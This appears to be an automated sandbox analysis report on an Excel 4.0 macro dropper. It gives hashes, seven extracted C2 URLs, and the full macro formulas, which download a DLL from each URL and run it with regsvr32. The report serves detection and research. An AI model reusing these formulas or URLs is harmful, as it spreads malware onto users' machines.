General

  • Target

    c9355cfd13bd7ec589f5bdebd64652c934afc6aa00188f0866b2ea508cffb797

  • Size

    21KB

  • Sample

    241111-1x8dps1laq

  • MD5

    f73be5787c3b5a01d5afe4048c3affa0

  • SHA1

    1c36e605b05994d4fe3bed5ddf2f262e0c94f2f4

  • SHA256

    c9355cfd13bd7ec589f5bdebd64652c934afc6aa00188f0866b2ea508cffb797

  • SHA512

    7c749c5718a146587335af5d1a52bc1af614d381feda4c90c7fe74810681df54536312563c6e74d3f535aaaeb2b84c8871ba46d388c17f0b632a422ccd2e30fa

  • SSDEEP

    384:H3uAi/NjIVRS8EibbwBlw75SYrLb5CzgObff9kC+xbX74eII:bsNs/zXtFCBn9kC+xbL42

Score
10/10

Malware Config

Extracted

  • Rule

    Excel 4.0 XLM Macro

  • C2

https://www.almoeqatar.com/cgi-bin/3g/

http://www.ayelet.info/wp-admin/oHRoG0X9ubuNtQ/

http://www.lavameapp.com.ar/slide-images/7bzQevDGMld/

http://lista33rivera.uy/wp-content/jiBtjSaJMcM/

http://cenaf.com.co/error/TpewL/

http://pusatbahasa.unsyiah.ac.id/backup/qWzXJpGddclh4zZjt/

http://baykusoglu.com.tr/wp-admin/317Sz3wZsYmAAmmL6/

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.almoeqatar.com/cgi-bin/3g/","..\rfs.dll",0,0)
    =IF('PCWV'!G13<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.ayelet.info/wp-admin/oHRoG0X9ubuNtQ/","..\rfs.dll",0,0))
    =IF('PCWV'!G15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.lavameapp.com.ar/slide-images/7bzQevDGMld/","..\rfs.dll",0,0))
    =IF('PCWV'!G17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://lista33rivera.uy/wp-content/jiBtjSaJMcM/","..\rfs.dll",0,0))
    =IF('PCWV'!G19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://cenaf.com.co/error/TpewL/","..\rfs.dll",0,0))
    =IF('PCWV'!G21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://pusatbahasa.unsyiah.ac.id/backup/qWzXJpGddclh4zZjt/","..\rfs.dll",0,0))
    =IF('PCWV'!G23<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://baykusoglu.com.tr/wp-admin/317Sz3wZsYmAAmmL6/","..\rfs.dll",0,0))
    =IF('PCWV'!G25<0,CLOSE(0),)
    =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\rfs.dll")
    =RETURN()

Extracted

  • Language

    xlm4.0

  • Source

    xlm40.dropper

Targets

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.
